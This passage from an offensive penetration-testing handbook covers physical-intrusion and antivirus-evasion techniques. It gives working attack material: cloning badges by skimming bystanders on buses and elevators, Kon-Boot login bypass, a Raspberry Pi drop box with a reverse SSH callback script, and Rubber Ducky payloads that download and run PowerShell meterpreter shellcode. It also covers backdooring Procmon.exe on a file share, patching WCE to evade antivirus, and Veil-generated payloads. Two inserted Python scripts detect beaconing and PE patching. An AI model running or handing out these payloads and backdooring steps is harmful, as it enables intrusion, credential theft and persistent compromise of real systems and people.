issue, we turn to Kali Nethunter and a Nexus 7 tablet. 


Get It Working In Kali Nethunter 

(https://forums.kali.org/showthread.php?23151-Tutorial-make-proxmark3-works-with-nethunter) 

1. Download http://thehackerplaybook.com/Download/proxdroid-bin-848.rar 

2. Inside the proxdroid rar file, you need to copy the file /system/bin/proxmark3 to the Nexus' 
/system/bin directory. Make sure to change the permissions to [rwxr-xr-x] (chmod 755 
/system/bin/proxmark3) 

3. Next, you need to copy both /system/lib/libreadline.so and /system/lib/libtermcap.so from the 
rar to the /system/lib directory with permissions [rw-r--r--] (chmod 644) 

4. We need to find out which port the Proxmark3 is using when connected to the Nexus device. A 
quick way to do this is: dmesg 

   1. [ 1449.061372] cdc_acm 1-2.1:1.0: ttyACM0: USB ACM device 
      [ 1449.073765] usbcore: registered new interface driver cdc_acm 
      [ 1449.073770] cdc_acm: USB Abstract Control Model driver for USB modems and ISDN adapters 

   2. In this case our interface is using ttyACM0 

5. Once we move all the files to our Nexus device and find which interface our Proxmark3 is using, 
we can start up our device: 

   1. proxmark3 /dev/[interface - e.g. ttyACM0] in a terminal from /system/bin 

6. I had errors with permissions on the Nexus when moving the files to /system/bin and /system/lib. 
To fix that issue, I had to re-mount the /system folder. 

   1. Nexus 7 Gen1 

      1. mount -o rw,remount /dev/block/platform/sdhci-tegra.3/by-name/APP/system /system ext4 
ro,relatime,user_xattr,acl,barrier=1,data=ordered 0 0 

   2. Nexus 7 Gen2 

      1. mount -o rw,remount /dev/block/platform/msm_sdcc.1/by-name/system /system 









Proxmark3 - Portable with Nexus 


Again, the issue with running a Proxmark3 with a battery pack was that you could only clone one 
card. Moreover, the issue with running it off a laptop is the size. With the Nexus tablet and a tablet 
case, I am able to power and run the Proxmark3 software with full functionality. Holding the tablet 
case, I can easily go into an elevator/subway/bus, hold my tablet case near everyone's badge and 
constantly collect them. I can then write them out to cards and use them to walk right in. 

One other thing that I have seen from collecting tag IDs is that companies generally buy tags in bulk. 
The HID tag IDs are set at the manufacturer site, so if you collect a number of tags, you can figure out 
the ranges in which they exist. For example, from the tag above (2004520045), we can brute-force 
through the tags near that range. Since different badges have different permissions, it is good to 
test whether you are able to guess a privileged badge using something like: 
https://github.com/brad-anton/proxbrute 


Kon-Boot 

(http://www.piotrbania.com/all/kon-boot/) (Windows/OS X) 


On a physical test, you might have gotten into the building, but you need a quick and easy way to get 
onto systems and servers. This is where Kon-boot comes into play. Kon-boot is a USB device that 
will allow you to bypass authentication on both Windows and OS X. 


On Windows, Kon-boot has additional functionality to bypass authentication without changing the password. 
However, on OS X, you need to either reset the password to blank or create a new user. The 
software works by "virtually modifying the EFI bios and then modifying parts of the OS X kernel. 
Such changes are only made in virtual memory and they disappear after computer reboot." 
http://www.piotrbania.com/all/kon-boot/ 




For both Windows and OS X (and Linux), there are known ways to get around authentication. On 
Windows, you can use something like ntpassword{41}, and on OS X, you can drop into single 
user mode and reset the admin password.{42} However, since my focus is really on efficiency, I'll 
stick with Kon-Boot: all you have to do is plug in the USB drive, reboot, and log into your victim host. 


The installation is pretty straightforward. After you purchase the corporate version of Kon-Boot, you 
will get a Windows executable. Take any USB stick and it will install Kon-Boot onto that device. All 
you need to do now is carry this little USB device: 



KON-BOOT USB Stick 


Windows 


On a reboot or system startup, make sure it boots from the USB drive so that Kon-Boot will kick in. 



[Screenshot: Kon-Boot boot banner - "www.thelead82.com - by Piotr Bania/LEAD82", "Kon-Boot ver. 2.4 -- ready! 32/64bit", a copyright notice, "Checking SMAP BIOS entries ...", and the detected BIOS.] 

Kon-Boot Bootup 


After Kon-Boot finishes, you will come to a login screen with no password configured. Just hit 
“enter” and you will be in the system. Another benefit is that it installs the sticky key functionality to 
popup a system shell. 

The best part of Kon-Boot is that once you reboot the system, the original password will be put back 
on the system. The end user will never know what happened. 


OS X: 

OS X Kon-boot for the most part is similar to the single-user mode reset. Kon-Boot can either reset 
the user account's password or create a new user account under kon-boot:kon-boot. 

[Screenshot: Kon-Boot USB boot menu on a Mac: "[0] Use kon-boot for Windows (UEFI)" / "[1] Use kon-boot for Mac". After "Using kon-boot for Mac!" it scans all disk drives, reports the MacBootEfi devices it found, installs its driver and asks "Please pick your option (0-1): [0] Use bypass feature (no new account) / [1] Use new-account feature (login: kon-boot password: kon-boot)", then prints "Using bypass mode!", "Driver loaded!", "Ready for lift off!" and "Everything seems to be ready (press any key to continue)".] 

Kon-boot on OS X 

Kon-boot - OS X No Password 


One thing to note is that this will not work against drives that are encrypted. For most tests these days, 
I am finding that laptops are more often encrypted, while desktops are not. 


Pentesting Drop Box - Raspberry Pi 2 


On a physical engagement, a pentesting drop box is essential to have in your toolkit. You can clone a 
couple badges, sneak your way into a company, drop a device onto the corporate infrastructure, and 
run. Either your drop box connects back via cellular or Wi-Fi, or it creates a remote shell back to a 
server of your choice. 

The big professional version of this is called a PwnPlug and you can purchase one from here: 
http://pwnieexpress.com/products/pwnplug-elite. The only problem is that the cost is pretty 
outrageous and the chance of losing your device is pretty high. 


In the previous Hacker Playbook, we used the oDroid U2, because of the speed and RAM 
requirements. The only downside was that although it was a fraction of the price of the PwnPlug, it 
still came to about $100 per box. If you have done a physical test before, you know you have lost a 
few in the process and $100+ adds up quickly. 


Luckily for us, the Raspberry Pi 2 was released, which is now six times faster (900 MHz Quad Core) 
and has 1GB of RAM. {43} 


You will have to buy a few items separately from the board, but not much: 

• Power Adaptor 

• USB Wi-Fi adaptor 

• 8 GB or larger microSD Class 10 or higher card 

• HDMI to view what is going on when booting the first time 



Raspberry Pi 2 Running Kali Linux 


Download Kali Linux Raspberry Pi 2 

• https://www.offensive-security.com/kali-linux-vmware-arm-image-download/ 


Or create your own image: 

• https://itfellover.com/l-kali-from-git-clone-and-booting-in-19-steps/ 

Setting up your new drop box with Kali is pretty easy. The guys over at Offensive Security did some 
great work and included ARM support specifically for one of these devices. 


Once you have downloaded or created the image for the Raspberry Pi 2, we need to install Kali on 
the microSD card. Plug the SD card into your 64-bit Kali host and locate the device node; running 
dmesg right after you plug it in will show where it was attached. Make sure the dd command below 
is pointed at the right device, since it overwrites whatever device it is given. 


Build the image on a 64-bit version of Kali Linux and write the image to the SD card: 

• wget https://raw.githubusercontent.com/offensive-security/kali-arm-build-scripts/master/build-deps.sh 

• chmod +x build-deps.sh && ./build-deps.sh 

• dd if=/root/kali-1.1.0-rpi.img of=/dev/sdb bs=4M 








Move that SD Card from your Kali host onto the Raspberry Pi 2 and run some initial configurations to 
update SSH, change the password, and expand the drive: 

• update-rc.d -f ssh remove 

• update-rc.d -f ssh defaults 

• dpkg-reconfigure openssh-server 

• passwd 

• wget https://raw.github.com/dweeber/rpiwiggle/master/rpi-wiggle 

• chmod +x rpi-wiggle 

• ./rpi-wiggle 


Afterwards, you can install whichever tools you need to install onto that image. 


Once you have your Raspberry Pi 2 device configured to your liking, we need to install a reverse 
shell to use as a drop box. I developed a quick little script called pi_phone_home. Once installed and 
running, when the drop box is plugged into any network, it automatically phones home and gives the 
attacker a full SSH tunnel to the drop box host. 

From a terminal type: 

• git clone https://www.github.com/cheetz/pi_phone_home /opt/pi_phone_home 

• cd /opt/pi_phone_home && chmod +x * 


We also need to make some modifications to the callback script. Remember that this box will log into 
your server on the Internet via SSH and create a local tunnel on your server. You will have to provide 
the script login credentials to your Internet-facing server: 

• gedit callback.sh 

• edit the domains, usernames, passwords, and port numbers 

The script, with the bracketed placeholders replaced by your own values, looks like this: 

#!/bin/sh 
# If a session to our server is already running, there is nothing to do. 
if ps -ef | grep -v grep | grep [your server you own] ; then 
    exit 0 
else 
    # Otherwise open a reverse tunnel: port 2221 on the server forwards to SSH (port 22) on the Pi. 
    sshpass -p 'PASSWORD' ssh -o "StrictHostKeyChecking no" -f -N -T -R2221:localhost:22 [your server you own] -p22 -l [USERNAME] >/dev/null & 
fi 


Once these modifications are made, we can start up the service: 

• ./setup.sh 

The setup file will install the proper dependencies, configure the local ssh server, make 
modifications with the sshd config, and add a cronjob to run the script every two minutes. 



[Screenshot: two terminals. Left, on the Internet-facing server: "netstat -ano | grep 2221" shows 127.0.0.1:2221 in LISTEN state, then "ssh root@127.0.0.1 -p 2221" logs in through the tunnel and "hostname" returns "kali". Right, on the Raspberry Pi: "./setup.sh" confirms openssh-server, openssh-client and sshpass are installed and generates an RSA key pair.] 


Dropbox SSH Tunnels 


In the terminal on the right, we kicked off the setup.sh script on our Raspberry Pi 2 device. After 
two minutes, the Pi device will connect back to our server (on the left) and log in via SSH. It will 
create a tunnel over port 2221. 


We can see this on our server by running “netstat -ano | grep 2221”. If we see an output, we know 
everything has worked perfectly. We can now SSH back through that tunnel to have full access on our 
Raspberry Pi. We can run: 

• ssh [username of Raspberry Pi server]@127.0.0.1 -p [tunnel port] 

As we can see in the left image above, we have connected back to our Raspberry Pi through the 
tunnel over SSH and run hostname. Now, we can kick off scans, run Metasploit, and more. 


Remember, after the first time you run this code, it adds a cronjob to run the script every five minutes. 
So even if you unplug your device and replug it in, it will automatically connect back to your SSH 
server. This is a great drop box to plug in and run away. 
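The fixed reconnect schedule that makes the drop box reliable is also what gives it away on the wire. As an added example (not code from the book or from pi_phone_home), the script below takes constructed outbound connection records and flags flows whose reconnect gaps are nearly constant, the check a network defender would run to hunt for this kind of beacon; the record format (timestamp, source, destination, port) is a constructed simplification, not a real sensor's log format.

```python
# Added example (not from the book or pi_phone_home): the drop box's cron job
# reconnects on a fixed schedule, and that regular cadence is what a network
# defender can key on. Outbound connection records are grouped by
# (source, destination, port) and groups whose inter-connection gaps are
# nearly constant are flagged. The record format below is constructed for
# this example and is not a real sensor's log format.
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: a drop box at 10.0.5.77 phoning home to 203.0.113.10:22
# every two minutes (with a little jitter), next to ordinary irregular traffic.
SAMPLE_CONNECTIONS = [
    # (epoch seconds, source IP, destination IP, destination port)
    (1000, "10.0.5.77", "203.0.113.10", 22),
    (1121, "10.0.5.77", "203.0.113.10", 22),
    (1240, "10.0.5.77", "203.0.113.10", 22),
    (1360, "10.0.5.77", "203.0.113.10", 22),
    (1479, "10.0.5.77", "203.0.113.10", 22),
    (1600, "10.0.5.77", "203.0.113.10", 22),
    (1005, "10.0.5.20", "198.51.100.8", 443),
    (1030, "10.0.5.20", "198.51.100.8", 443),
    (1400, "10.0.5.20", "198.51.100.8", 443),
    (1450, "10.0.5.20", "198.51.100.8", 443),
    (1900, "10.0.5.20", "198.51.100.8", 443),
    (1200, "10.0.5.31", "203.0.113.10", 22),
]


def find_periodic_connections(records, min_count=5, max_jitter=0.1):
    """Return [(src, dst, dport, period_seconds)] for flows whose connection
    gaps are regular: at least min_count connections, and a standard deviation
    of the gaps no larger than max_jitter times the mean gap."""
    flows = defaultdict(list)
    for ts, src, dst, dport in records:
        flows[(src, dst, dport)].append(ts)
    findings = []
    for key, times in flows.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        period = mean(gaps)
        if period > 0 and pstdev(gaps) / period <= max_jitter:
            findings.append((*key, round(period)))
    return findings


if __name__ == "__main__":
    for src, dst, dport, period in find_periodic_connections(SAMPLE_CONNECTIONS):
        print(f"{src} -> {dst}:{dport} reconnects about every {period}s")
```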


Rubber Ducky 

( http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe ) 


Rubber Ducky is a USB device that is called a HID or Human Interface Device. Now that most 
systems no longer allow autorun by default, we need to get creative. The Rubber Ducky device looks 
just like a standard USB stick, but instead of storing files and data, it stores keystrokes (emulating 
someone typing on the keyboard). This is how we can get around issues like autorun and quickly 
use keystrokes to compromise a machine. 

So if we had physical access to a computer and wanted to compromise the system, what would we 
do? One way would be to hit the start menu, drop into an administrative CMD shell (bypassing UAC), 
and execute a PowerShell script to download and execute a malicious payload. This might look like 
the following: 


Ducky admin$ cat duckycode.txt 

• ESCAPE 

• CONTROL ESCAPE (Brings up start menu) 

• DELAY 400 

• STRING cmd (types “cmd”) 

• DELAY 400 

• MENU (right clicks on cmd) 

• DELAY 400 

• STRING a (types “a” to select run as administrator) 

• DELAY 600 

• LEFTARROW (presses the left arrow button) 

• ENTER 

• DELAY 600 

• STRING cmd.exe /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.102/winword.exe','winword.exe'); (New-Object -com Shell.Application).ShellExecute('winword.exe')" (Runs a PowerShell script to download and execute a file) 

• ENTER 

• STRING exit (close the command prompt) 

• ENTER 


Try these exact same commands on your Windows 7 host and you will see exactly what it is doing. 
Now, we can easily change the string to download a PowerShell script instead and execute a 
Meterpreter shell: 

• Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSplc 
-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.102 -Lport 8080 -Force 

The code to run the encoder can be found on your rubber ducky or here: 

https://drive.google.com/drive/#folders/0B7uVAbdkMKcXNW1KdnBrOzZtV3c 

The ducky code can be injected onto the microSD card using the following command (this was done 
on a Mac, but it is OS independent as the encoder runs in Java). 


The encoder jar file will take the code we supplied and write to an inject.bin file on the microSD 
card. To write your code, it uses the following syntax: 

• java -jar encoder.jar -i [your code] -o [location and file to which to write on the 
microSD card] 



Example: 

• admins-mbp:Ducky admin$ java -jar encoder.jar -i duckycode.txt -o /Volumes/Untitled/inject.bin 


Hak5 Duck Encoder 2.6.3 

Loading File. [ OK ] 

Loading Keyboard File. [ OK ] 

Loading Language File. [ OK ] 

Loading DuckyScript. [ OK ] 

DuckyScript Complete. [ OK ] 

After successfully writing to the microSD card, we can assemble our USB stick again and will be all 
set. Once we plug in this USB drive into a computer, we will see the following on the computer 
screen: 


[Screenshot: a Windows 7 Start menu search for "cmd" with the right-click context menu open on cmd.exe ("Open", "Run as administrator", ...), and an Administrator cmd.exe window running: cmd.exe /c "PowerShell (New-Object System.Net.WebClient) ... .ShellExecute('winword.exe')"] 

Rubber Ducky 



This is only the beginning of what you can do with a HID device. Two additional sites that describe 
additional functionality or pre-made scripts to inject into your rubber ducky are: 

• https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads 

• http://ducktoolkit-411.rhcloud.com/ScriptSelection.jsp 

























[Screenshot: the Duck Toolkit web site (tabs: Home, Encoder, Payload Gen, Twin Duck, About). Its "Create Script" page offers Reconnaissance scripts (computer, user, USB, shared drive and program information, installed updates, user document list, basic network information, network scan, port scan, copy wireless profile, take screen captures, copy Firefox profile, extract SAM file) and Exploitation scripts (find and upload file over FTP, disable firewall, add user, open firewall port, start Wi-Fi access point, share C:\ drive, enable RDP), with a "Continue" button once the required scripts are selected.] 

Rubber Ducky Payloads 


Conclusion 

Attacks where you need to be physically onsite require a lot of patience 
and practice. As you probably already know, these types of attacks give 
the largest adrenaline rushes. It is very important to keep calm and make 
sure you know exactly what you need to do and do it as quickly as 
possible. The best scenario for you is to be in and out without alarming 
a single person. My advice: practice, practice, and practice. 











The Quarterback Sneak - Evading AV 


My feelings on Anti-Virus (AV) scanners are that they are there to stop the script kiddies or 
old malware. If you are using the default settings for Metasploit or using files you downloaded from 
the Internet, chances are that you are not only going to get caught, but your whole engagement could be 
over. The element of surprise can play a huge factor in how successfully you move laterally 
throughout the environment. This chapter will go into how to make sure you stay ahead of the curve 
and do not alert AV scanners. 


Evading AV 


I regularly run into AV programs that alert on or block the standard Meterpreter payload, Windows 
Credential Editor (WCE), or other common penetration testing tools. Even the encoders in 
Metasploit, like msfvenom and Shikata Ga Nai, just aren't cutting it anymore. So here are a slew of 
other options. 


The Backdoor Factory 

( https://github.com/secretsquirrel/the-backdoor-factory ) (Kali Linux) 


The goal of BDF is to patch executable binaries with user-desired shellcode and then continue normal 
execution of the pre-patched state. How can you use this to your advantage? Persistence is the key! 
First, we need to find a file to which to add our shellcode. What is the best method for this? 


Research was done by harmj0y to find the best files to backdoor by searching open shares. {44} What 
if we can search the file share server and find the last accessed file? This way, we know that the files 
are regularly used. If you have a command shell on a victim, you can run the following two 
commands: 

• Powershell.exe "IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | Out-File -Encoding ascii found_shares.txt" 


This first command will find all the shares on the network that the user has access to. You can either 
modify this text file to be more targeted or go the slow route and look at all files. I have found it best 
to modify this file to target file shares on the network: 

• Powershell.exe "IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-FileFinder -ShareList .\found_shares.txt -FreshEXEs -ExcludeHidden -CheckWriteAccess" 



The second command takes the output from the share enumeration and starts enumerating all the executables, 
recording the LastAccessTime and LastWriteTime of each. In the example below, we see that Procmon.exe on 
the fileshare has the most recent access time. This is an indication that it could be regularly used. If we 
modify this file, there is a good chance that it will get executed continually. 
[Screenshot: PowerView - Invoke-FileFinder output, with Procmon.exe showing the most recent LastAccessTime] 
Let's grab a copy of Procmon.exe from the user and modify that binary. Dropping that binary onto 
our Kali host, we can run BDF on that file. We are going to modify the Procmon.exe executable to 
include a Meterpreter reverse HTTPS payload that connects back to your Kali host over the specified 
port. 


Open up a terminal and run the following commands: 

• cd /opt/the-backdoor-factory/ 

• ./backdoor.py -f ~/Desktop/Procmon.exe -s meterpreter_reverse_https -H <your Kali IP> -P 8080 


[Screenshot: backdoor.py (The Backdoor Factory, by Joshua Pitts) reports: in the backdoor module, checking if the binary is supported, gathering file info, reading Win32 entry instructions, looking for and setting selected shellcode, creating the Win32 resume execution stub, then "Looking for caves that will fit the minimum shellcode length of 762" and "All caves lengths: (762,)". Three candidate caves are listed (two in the .rsrc section, one in .reloc) with section begin/end, cave begin/end and cave size, followed by "Enter your selection:".] 


BDF Patching 


Once you execute backdoor.py, you need to find a Cave, which is an area of 0’s to hold your 
shellcode. If you don’t like the locations initially suggested, you can press “j” or jump to see 
additional caves. 


[Screenshot: after pressing "j", BDF lists many more caves (numbered up to 96) in the .rsrc and .reloc sections with their begin/end offsets and sizes. After the selection it reports: looking for and setting selected shellcode, creating code cave, adding a new section to the exe/dll for shellcode injection, patching initial entry instructions, creating Win32 resume execution stub, overwriting certificate table pointer, "/root/Desktop/Procmon.exe backdooring complete", and that the file is in the 'backdoored' directory.] 


BDF Caves 













Once you find a cave that works, press “a” to append your code. After this is complete, BDF will 
drop the newly created executable in the folder backdoored. 


Now, take that file and put it back on the fileshare. The file should execute perfectly, the user will 
still have all the functionality of Procmon, but every time they run it, it will connect back to our 
Metasploit handler. 
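BDF's own output above spells out what it leaves behind: a redirected entry point, a new section and a cleared certificate table pointer. As an added example (not code from the book or from The Backdoor Factory), the script below compares the PE header of a known-good copy of a binary against a suspect copy and reports exactly those changes, which is the check a defender with a reference copy or file-integrity baseline would run; the two images it compares are constructed minimal PE headers with no code, not Procmon.exe.

```python
# Added example (not code from the book or from The Backdoor Factory): BDF's
# output lists the changes it makes to Procmon.exe: it patches the entry
# instructions, adds a new section for the shellcode and overwrites the
# certificate table pointer. A defender holding a known-good copy can detect
# exactly those changes by comparing the two PE headers. The PE images below
# are constructed minimal headers with no code; they are not Procmon.exe.
import struct

SECURITY_DIR = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY: Authenticode certificate table


def build_pe(sections, entry_rva, cert_offset, cert_size):
    """Build a minimal PE32 header: DOS header, COFF header, optional header
    (with the security data directory filled in) and a section table."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                  # e_lfanew: PE header at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)             # AddressOfEntryPoint
    struct.pack_into("<I", opt, 92, 16)                    # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * SECURITY_DIR, cert_offset, cert_size)
    table = b""
    for name, rva, size, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             size, rva, size, 0, 0, 0, 0, 0, chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


def parse_pe(data):
    """Extract the fields worth comparing: entry point, section table and the
    security data directory (file offset and size of the certificate table)."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt_off = pe_off + 24
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]
    nrva = struct.unpack_from("<I", data, opt_off + 92)[0]
    security = (0, 0)
    if nrva > SECURITY_DIR:
        security = struct.unpack_from("<II", data, opt_off + 96 + 8 * SECURITY_DIR)
    sections = []
    for i in range(nsec):
        raw = struct.unpack_from("<8sIIIIIIHHI", data, opt_off + opt_size + 40 * i)
        # (name, VirtualAddress, VirtualSize, Characteristics)
        sections.append((raw[0].rstrip(b"\0").decode(), raw[2], raw[1], raw[9]))
    return {"entry": entry, "sections": sections, "security": security}


def section_of(rva, sections):
    """Name of the section whose virtual range contains rva ('?' if none)."""
    for name, start, size, _ in sections:
        if start <= rva < start + size:
            return name
    return "?"


def diff_pe(good, suspect):
    """Compare a known-good header against a suspect one and describe the
    changes a binary-patching tool leaves behind."""
    findings = []
    if good["entry"] != suspect["entry"]:
        findings.append("entry point moved from 0x%x in %s to 0x%x in %s" % (
            good["entry"], section_of(good["entry"], good["sections"]),
            suspect["entry"], section_of(suspect["entry"], suspect["sections"])))
    known = {s[0]: s for s in good["sections"]}
    for name, rva, size, chars in suspect["sections"]:
        if name not in known:
            findings.append("section %s added (rva 0x%x, size 0x%x, characteristics 0x%x)"
                            % (name, rva, size, chars))
        elif known[name][1:] != (rva, size, chars):
            findings.append("section %s changed" % name)
    if good["security"][1] and not suspect["security"][1]:
        findings.append("certificate table pointer cleared: the Authenticode signature is gone")
    return findings


# Constructed "known good" header: three sections, entry point in .text, signed.
ORIGINAL = build_pe([(".text", 0x1000, 0x5000, 0x60000020),
                     (".rsrc", 0x6000, 0x2000, 0x40000040),
                     (".reloc", 0x8000, 0x1000, 0x42000040)],
                    entry_rva=0x1234, cert_offset=0x9000, cert_size=0x1800)
# Constructed "suspect" header mirroring what BDF's output reports: a new
# section, the entry point redirected into it, and the certificate table zeroed.
PATCHED = build_pe([(".text", 0x1000, 0x5000, 0x60000020),
                    (".rsrc", 0x6000, 0x2000, 0x40000040),
                    (".reloc", 0x8000, 0x1000, 0x42000040),
                    (".new", 0x9000, 0x1000, 0xE0000020)],
                   entry_rva=0x9000, cert_offset=0, cert_size=0)

if __name__ == "__main__":
    for finding in diff_pe(parse_pe(ORIGINAL), parse_pe(PATCHED)):
        print(finding)
```

A hash comparison against the reference copy catches any change at all; the header diff additionally tells the responder which of BDF's edits were made.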


[Screenshot: Windows Explorer showing Procmon.exe among the other executables on the share, and Process Monitor (Sysinternals) running normally, listing RegQueryValue and Thread Create operations for the Procmon process.] 

Malicious Procmon 


Just in case you forgot how to create a handler for your file, this is what it will look like. On your 
Kali host, copy the following text to /opt/listener.rc: 

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_https 
set LHOST <Your Kali IP> 
set LPORT 8080 
set ExitOnSession false 
exploit -j -z 


To start your listener, use the following command: 
• msfconsole -r /opt/listener.rc 










[Screenshot: msfconsole started with the resource file, running Metasploit v4.11.0. It processes the file (use exploit/multi/handler, set PAYLOAD windows/meterpreter/reverse_https, set LHOST 172.16.151.128, set LPORT 8080, set ExitOnSession false, exploit -j -z) and reports "Started HTTPS reverse handler on https://0.0.0.0:8080/".] 


Meterpreter Session 


Hiding WCE From AV (Windows) 


I love Windows Credential Editor (WCE) because it can take clear text passwords from memory. 
However, the problem with WCE is that all AV vendors pretty much flag this executable. The quick 
and simple way to bypass AV is through a process of identifying where the AV signature is inside the 
WCE file and modifying it. 


Example: Evade 

( https://www.securepla.net/antivirus-now-you-see-me-now-you-dont ) (Windows) 

On your Windows host, open Evade. Evade takes an executable and makes multiple versions of that 
file based on the defined size. Let's say you have a 50k file and you want to split the file by 5k. It 
will make 10 different versions of that file. The first one will contain only the first 5k of the file (the 
MZ header and some additional information). The second file will include the first 5k plus the next 
5k of data, and so on for the rest of the files. 


In the following examples, we loaded WCE, defined an output location and hit Split! If we look in the 
folder defined in our output, we see that it chopped up the files. 






Evade 


[Screenshot: Explorer view of C:\Demo\wce_parse listing TestFile_5000.exe (5 KB) through TestFile_75000.exe (74 KB) in 5 KB steps] 

Evade Output 


We should have a bunch of different files. If we open a hex editor (HxD) and look at one of the files, 
we see that the first 5000 bytes are in the first file and 10,000 bytes are in the second file. 
































[Screenshot: HxD hex editor with TestFile_5000.exe open, showing the last rows of the file (offsets 0x12C0 through 0x1380)] 


HEX Output at 5000 8ytes 


[Screenshot: HxD hex editor with TestFile_10000.exe open, showing the last rows of the file (offsets 0x25E0 through 0x2700)] 


HEX Output at 10000 Bytes 

File Comparison 


If we open up our calculator, we can see if we subtract the hex values 270F - 1387, we get 1388. 
Converting 1388 to Decimal, we get 5000. Perfect! 


Start with the smallest file (5k) and scan that file with your AV of choice. Does an AV signature 
trigger on that file? If no, keep going through each version of that file. When you finally do get AV to 
trigger, you know that something between the last file and the clean file contains the string that the 
Antivirus program looks for. 










[Screenshot: Explorer view of the wce_parse folder listing Testfile_5000 through Testfile_100000 (type Application, 5 KB to 59 KB shown), alongside an AV alert "Potentially Unwanted Program Blocked: prevented a potentially unwanted program from running. Protect your PC by only allowing programs you trust" with Remove / Allow / Close buttons.] 


Finding Which File Triggers AV 


When dropping the folder containing all of the split files, AV instantly starts alerting the user about 
malicious files and starts cleaning up. When the cleanup is complete, we see that all the files before 
TestFile_130000 are still present in that folder. That means the trigger for the IDS signature lies 
between the 125000-byte mark and the 130000-byte mark of the file. 


Let's see what is at that location. If we convert the decimal 125000 to hex, we get 1E848. Let's 
take a look in HxD to see what is there. From location 1E848, we can look around to see what 
caused the signature to fire, or we can run Evade again to get more granular. 


In this case, it looks like I was able to identify what the IDS signature is looking for: it looks for the 
name of the application and the owner. 













[Screenshot: HxD with wce.exe open at offsets 0x1F600 through 0x1F6B0. The ASCII column reads "...ned! could not allocate memory for new list!" followed by the banner "WCE %s (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)" and then "Use -h for h..."] 


Identifying the String that Triggers AV 


With HxD, we can write over these values and save our executable to a new file. 


[Figure: HxD hex view of the copy saved as wce2.exe, offsets 0001F4F0 through 0001F6C0. The surrounding strings are unchanged ("%.2X" format strings, "Using WCE Windows Service...", "Forced Safe Mode Error: cannot read credentials using 'safe mode'.", "something terrible happened! could not allocate memory for new list!", "Use -h for help. Options:"), while the banner bytes from 0001F640 through 0001F6B0 have been overwritten with 0x41, so the ASCII column shows rows of "AAAAAAAAAAAAAAAA" where the copyright string used to be.]


Modifying the Signature to Evade AV 


I wrote over those values with all A's and saved my file as wce2.exe. Luckily, the signature in this 
case was not actually part of the executable code, but part of the application's output text. Let's take our 
sample to the AV box and run the scan again. 


[Figure: McAfee scan of wce2.exe (Application, 195 KB): "Your computer is secure (no action required)", "Scan is done", "McAfee did not detect any issues on your PC. No further action is required."]


Successful AV Scan


After scanning the file, AV no longer picked it up and the application still ran perfectly. One thing 
to note here is that this worked because the values we modified in the file did not affect the execution 
of the executable. If the signature had been based on code that cannot be modified without breaking the 
program, this trick would not work. I just wanted to demonstrate some weaknesses of AV and the concept 
of how to bypass them. 


Veil 

(https://github.com/Veil-Framework) (Kali Linux) 


Veil is a payload generator for bypassing antivirus, created by Christopher Truncer. The tool uses a 
lot of different methods to evade AV, but it is best known for taking the Meterpreter shell, converting 
it to Python, and wrapping it with py2exe/pyinstaller. This way the executable can bypass a lot of 
white-listing tools and AV, because Python is usually an approved, white-listed application and the 
payload can easily be encoded so that it bypasses AV. There are a lot of different ways to use Veil, but I 
will go over the most general one. 

• cd /opt/Veil/Veil-Evasion 

• ./Veil-Evasion.py 

• To see all payloads: 

o list 

• We are going to use python/meterpreter/rev_https: 

o use 25 

o set LHOST [Your Kali IP] 

o generate 

o use pyinstaller 







Veil-Evasion | [Version]: 2.17.0 
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework 

[*] Executable written to: /root/veil-output/compiled/undetected.exe 

Language:          python 
Payload:           python/meterpreter/rev_https 
Required Options:  LHOST=172.16.151.141  LPORT=8443  compile_to_exe=Y  use_pyherion=N 
Payload File:      /root/veil-output/source/undetected.py 
Handler File:      /root/veil-output/handlers/undetected_handler.rc 

[*] Your payload files have been generated, don't get caught! 
[!] And don't submit samples to any online scanner! 

[>] press any key to return to the main menu: 


Veil-Evasion 



The output results in two files: 

1. Under /root/veil-output/compiled/ is the executable to drop on the Windows system. 

2. The other file, /root/veil-output/handlers/undetected_handler.rc, is the Metasploit handler file. 


First, set up the listener for the handler: 

• msfconsole -r /root/veil-output/handlers/undetected_handler.rc 


Execute the payload on the Windows victim host: 


Veil-Evasion - Python 


I highly recommend testing with the Ruby executable as well. Instead of using the payload 
python/meterpreter/rev_https, select ruby/meterpreter/rev_https. The process is the same, but instead 
of a pyinstaller executable, it is a Ruby executable. 

















[Figure: msfconsole output from the Ruby handler file] 

resource (/root/veil-output/handlers/ruby_undetected_handler.rc)> set PAYLOAD windows/meterpreter/reverse_http 
PAYLOAD => windows/meterpreter/reverse_http 
resource (/root/veil-output/handlers/ruby_undetected_handler.rc)> set LHOST 172.16.151.141 
LHOST => 172.16.151.141 
